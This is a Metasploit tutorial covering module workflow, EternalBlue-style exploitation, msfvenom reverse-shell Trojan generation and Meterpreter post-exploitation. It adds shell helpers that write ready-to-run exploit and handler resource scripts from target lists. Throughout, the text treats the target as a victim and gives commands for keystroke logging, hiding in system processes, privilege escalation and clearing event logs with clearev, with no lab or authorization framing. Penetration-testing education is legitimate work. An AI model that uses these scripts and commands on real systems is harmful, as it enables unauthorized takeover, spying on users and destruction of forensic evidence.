MSF basics

Metasploit Framework (written in Ruby), the fundamentals:

MSF ships one of the world's largest collections of public exploits for penetration testing

Vulnerability: a weakness in software, a configuration or a service that an attacker can abuse

Exploit: the code or program that triggers a vulnerability

Payload: the code that runs on the target once the exploit has succeeded and does the actual work of the attack (a shell, Meterpreter, etc.)

Module: the basic building blocks of the framework; each module performs one specific task (exploit, payload, auxiliary, encoder, post, ...)


Running MSF:

    sudo service postgresql start    (start the PostgreSQL database that msfconsole keeps its workspace in)

MSF architecture:

Introduction to MSF modules:

Exploits: the core modules of MSF. They contain attacks against different services on different operating systems, including macOS and Android.

Encoders: transform the bytes of a payload (originally to avoid bad characters such as null bytes). They are no longer useful for antivirus evasion; if you need that you have to write your own code.

Nothing in these notes does antivirus evasion, so a stock payload generated here will be caught by current antivirus.

MS17-010: "MS" stands for Microsoft, "17" for the year 2017 and "010" for the tenth security bulletin of that year.

MSF basic commands:

Command          Meaning
use              select the exploit module
show payloads    list the payloads compatible with the selected module
set payload      choose the payload
set target       choose the target (the OS/version variant the module supports)
show options     list the parameters that still need to be set
exploit          run the exploit

Note: the exploit modules live under /usr/share/metasploit-framework/modules/exploits

MSF direct exploitation

1. search <keyword> to find the module (for example search ms17-010)

2. use the matching exploit module, then show options to see what needs to be configured

Options whose Required column says yes must be set

Port 445 is the SMB service, which Windows hosts have enabled by default

3. set RHOSTS <IP> configures the target address(es); a file with one target per line can be given as set RHOSTS file:<path>

Payloads:

linux/x64/meterpreter/bind_ipv6_tcp (or the windows/ equivalent): a bind payload opens a port on the target and waits for the attacker to connect to it

windows/x64/meterpreter/reverse_named_pipe: a reverse payload makes the attacker's machine listen and the compromised target connect back (named-pipe transports exist only for Windows payloads)

The last part of the name (named_pipe, ipv6_tcp, tcp, tcp_rc4, http, https, ...) is the transport the connection uses

set payload windows/x64/meterpreter/reverse_named_pipe    selects the payload

show options    now also lists the options the payload added (for a reverse_tcp payload: LHOST and LPORT)
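To see what a payload name encodes before choosing one, here is a small POSIX shell helper. It is an example added to these notes, not code from the original post or from Metasploit. It splits a payload name into platform, architecture, stage, staged/stageless, direction (bind or reverse) and transport, and says which side has to open the listening port. The payload names in the comments are real Metasploit names; the output format is this helper's own invention.

```shell
#!/bin/sh
# Added example (not from the notes, not part of Metasploit): decode what an MSF
# payload name tells you before you "set payload". Pure shell, nothing to install.
#
#   windows/x64/meterpreter/reverse_tcp         staged:    stager "/" stage are separate pieces
#   windows/x64/meterpreter_reverse_tcp         stageless: one piece, "_" instead of "/"
#   linux/x64/meterpreter/bind_ipv6_tcp         bind:      the TARGET listens on a port
#   windows/x64/meterpreter/reverse_named_pipe  reverse:   the ATTACKER listens, target calls back
#   windows/meterpreter/reverse_tcp             no arch component means x86
# Covers the meterpreter/shell style names used in the notes, not cmd/* one-liners.

payload_info() {
    name=$1
    # Split on "/" into at most four parts (unused parts stay empty).
    IFS=/ read -r platform p2 p3 p4 <<EOF
$name
EOF
    if [ -n "$p4" ]; then
        # platform/arch/stage/handler_transport
        arch=$p2; stage=$p3; tail=$p4; staging=staged
    else
        case "$p3" in
            reverse_*|bind_*)
                # platform/stage/handler_transport, arch omitted
                arch=x86; stage=$p2; tail=$p3; staging=staged ;;
            '')
                # platform/stage_handler_transport, e.g. windows/shell_reverse_tcp
                arch=x86; stage=${p2%%_*}; tail=${p2#*_}; staging=stageless ;;
            *)
                # platform/arch/stage_handler_transport
                arch=$p2; stage=${p3%%_*}; tail=${p3#*_}; staging=stageless ;;
        esac
    fi
    # The direction decides which side opens the listening port.
    case "$tail" in
        reverse_*) direction=reverse; listener=attacker ;;
        bind_*)    direction=bind;    listener=target ;;
        *)         direction=unknown; listener=unknown ;;
    esac
    transport=${tail#*_}    # tcp, ipv6_tcp, named_pipe, tcp_rc4, http, https ...
    echo "platform=$platform arch=$arch stage=$stage staging=$staging direction=$direction transport=$transport listener=$listener"
}

# Usage: sh payload_info.sh windows/x64/meterpreter/reverse_tcp linux/x64/meterpreter/bind_ipv6_tcp
for n in "$@"; do payload_info "$n"; done
```

The staged/stageless distinction matters later, when the handler has to deliver the second piece: a staged name has a slash before reverse_ or bind_, a stageless one has an underscore.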


So an MSF remote-control attack is configured in two halves: the exploit and the payload

search <keyword> -> use <exploit module> -> show options -> set the required options -> show payloads -> set payload <name> -> show options -> set the payload's options -> exploit
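The chain above can be scripted: msfconsole reads commands from a resource file (msfconsole -q -r attack.rc). The helper below is an example added to these notes, not code from the original post or from Metasploit. It writes such a file for an exploit module, accepts RHOSTS either as an address or as file:<path>, checks that a target file exists and is not empty, and refuses to write a script for something that is not an exploit module. The module, payload and addresses in the usage comment are illustrative assumptions (ms17_010_eternalblue is a real module name, but use whatever your search turned up).

```shell
#!/bin/sh
# Added example: write an msfconsole resource script for the
# search -> use -> show options -> set ... -> set payload -> exploit workflow.
# Run the result with:  msfconsole -q -r attack.rc
# Module, payload and addresses in the usage comment are illustrative assumptions.

# exploit_rc MODULE PAYLOAD RHOSTS LHOST LPORT  -> prints the resource script
# RHOSTS may be one address, a range, or file:<path> with one target per line.
exploit_rc() {
    module=$1 payload=$2 rhosts=$3 lhost=$4 lport=$5
    case "$module" in
        exploit/*) ;;
        *) echo "not an exploit module (expected exploit/...): $module" >&2; return 1 ;;
    esac
    case "$rhosts" in
        file:*)
            list=${rhosts#file:}
            if [ ! -r "$list" ]; then
                echo "target list is not readable: $list" >&2; return 1
            fi
            if ! grep -q '[^[:space:]]' "$list"; then
                echo "target list is empty: $list" >&2; return 1
            fi ;;
        '') echo "RHOSTS is required" >&2; return 1 ;;
    esac
    # Same order as typing it into msfconsole by hand; "show options" stays in
    # so the console prints the final configuration before the attack runs.
    cat <<EOF
use $module
set RHOSTS $rhosts
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
show options
exploit
EOF
}

# Usage (illustrative values):
#   printf '10.0.0.5\n10.0.0.6\n' > targets.txt
#   exploit_rc exploit/windows/smb/ms17_010_eternalblue windows/x64/meterpreter/reverse_tcp \
#              file:targets.txt 10.0.0.2 4444 > attack.rc
```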


How an MSF attack runs:

The [*] lines show the progress of the attack: first a listener is started on the attacker's machine (port 4444, the default LPORT for a reverse payload)

Then the target is probed (with the module's own check or an auxiliary scanner module)

When a live, vulnerable host is found the exploit is launched

Red [-] lines mean the attack failed

Part 2: MSF remote control

Command: msfvenom

It generates a controllable executable, i.e. a Trojan, that is run on the victim machine

msfvenom -l payloads    lists all payloads

msfvenom --list platforms    lists the platforms a Trojan can be generated for


Generating a remote-control Trojan for Windows:

1. Generate the Trojan with msfvenom

msfvenom -p <payload> LHOST=<attacker IP (not 127.0.0.1)> LPORT=<port the victim connects back to> -f <output format> > <output path and name>

For example, a Windows reverse-shell Trojan:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f exe > name.exe

A Linux reverse-shell Trojan:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f elf > name.elf

2. Deliver the Trojan to the target machine

3. Listen for the reverse connection in msfconsole

Start Metasploit and set the listening parameters:

    use exploit/multi/handler    (the generic listener module)
    set payload <the same payload that msfvenom was given>
    set LHOST <same value as for msfvenom>
    set LPORT <same value as for msfvenom>
    exploit                      (listen and wait for the victim to run the Trojan)

If it works, msfconsole reports that a session was opened

sessions -l    lists the open sessions

Staged payloads such as meterpreter/reverse_tcp are delivered in two pieces: a small stager is sent first and it then downloads the rest (the stage) from the handler. If that download fails only the stager is present on the target. Stageless payloads (meterpreter_reverse_tcp, with an underscore) contain everything in one piece.
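The msfvenom command and the handler must agree on payload, LHOST and LPORT, and LHOST must be an address the victim can actually reach. The helper below is an example added to these notes, not code from the original post or from Metasploit: it builds both the msfvenom command line and the multi/handler resource script from one set of parameters, rejects a loopback LHOST or a bad port, and refuses an exe for a Linux payload or an elf for a Windows one. It uses msfvenom's -o <file> option instead of the shell redirection shown above, and adds set ExitOnSession false plus exploit -j -z so the handler keeps listening in the background after the first session. The payload names and addresses in the usage comment are illustrative assumptions.

```shell
#!/bin/sh
# Added example: build the msfvenom command and the matching multi/handler
# resource script from ONE set of parameters, so the payload, LHOST and LPORT
# used for the Trojan and for the listener can never drift apart.
# Payload names and addresses in the usage comment are illustrative assumptions.

# check_listener LHOST LPORT: the address and port the victim will connect back to.
check_listener() {
    case "$1" in
        ''|127.*|0.0.0.0|localhost)
            echo "LHOST must be the attacker's reachable IP, not '$1'" >&2; return 1 ;;
    esac
    case "$2" in
        ''|*[!0-9]*) echo "LPORT must be a number, got '$2'" >&2; return 1 ;;
    esac
    if [ "$2" -lt 1 ] || [ "$2" -gt 65535 ]; then
        echo "LPORT out of range: $2" >&2; return 1
    fi
}

# check_format PAYLOAD FORMAT: an exe only runs a windows payload, an elf a linux one.
check_format() {
    case "$1/$2" in
        windows/*/exe|linux/*/elf) ;;
        *) echo "format '$2' does not match payload '$1'" >&2; return 1 ;;
    esac
}

# venom_cmd PAYLOAD LHOST LPORT FORMAT NAME -> the msfvenom command line
venom_cmd() {
    check_listener "$2" "$3" && check_format "$1" "$4" || return 1
    # -o <file> is the same as "> <file>" in the notes, without relying on shell redirection
    echo "msfvenom -p $1 LHOST=$2 LPORT=$3 -f $4 -o $5.$4"
}

# handler_rc PAYLOAD LHOST LPORT -> resource script, run with: msfconsole -q -r handler.rc
handler_rc() {
    check_listener "$2" "$3" || return 1
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# Usage (illustrative values):
#   venom_cmd  windows/x64/meterpreter/reverse_tcp 10.0.0.2 4444 exe agent   # then run that command
#   handler_rc windows/x64/meterpreter/reverse_tcp 10.0.0.2 4444 > handler.rc
#   msfconsole -q -r handler.rc
```

Generating both from the same three values is the whole point: a mismatched LPORT or a payload that differs from the Trojan's is the most common reason a handler sits there and never reports a session.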


Once a session is open, shell drops into a command prompt on the target

There are many more commands: screenshot (take a screenshot), keyscan_start (start capturing keystrokes), mouse (send mouse events), etc.

lcd    changes the local (attacker-side) working directory

upload <src>    copies a local file into the target's current directory, used to stage further tools


Meterpreter overview

Introduction:

·Meterpreter is the flagship payload of the Metasploit framework. It is normally used as the payload delivered after an exploit succeeds: once the exploit has triggered the vulnerability, it gives us a control channel back from the target.

· For example, when a vulnerability in the remote procedure call (RPC) service is exploited with Meterpreter selected as the payload, we obtain a Meterpreter shell on the target system.

·Meterpreter is an extension of the Metasploit framework and can use its functionality, such as anti-forensics, in-memory-only operation, password hash dumping, privilege escalation and pivoting, to penetrate the target further

Technical advantages:

·Metasploit provides Meterpreter builds for all major platforms, including Windows and Linux, on both x86 and x64.

·Meterpreter runs entirely in memory: the stage is never written to the target's disk, which keeps it away from file-based antivirus scanning and leaves fewer traces. It is not invisible, though: the process, its injected code and its network connection can still be detected.

· In addition, Meterpreter has PHP and Java implementations.


reverse_tcp sessions:

Hiding the Trojan: process migration (migrating into a process owned by another user, such as a SYSTEM service, requires that level of privilege)

ps    lists the current processes

migrate <PID>    moves the Meterpreter session into that process, usually a long-lived system process, because the session dies when the process it lives in exits

exploit -j -z    runs the handler as a background job, so the console stays usable while it keeps listening

clearev    clears the target's event logs once the attack is finished


Various other useful commands:

getsystem    tries to escalate privileges to SYSTEM

play    plays a .wav file on the target

portfwd    forwards ports through the session

execute -f <file>    runs a program on the target

sysinfo    shows information about the target system

shutdown    shuts the target host down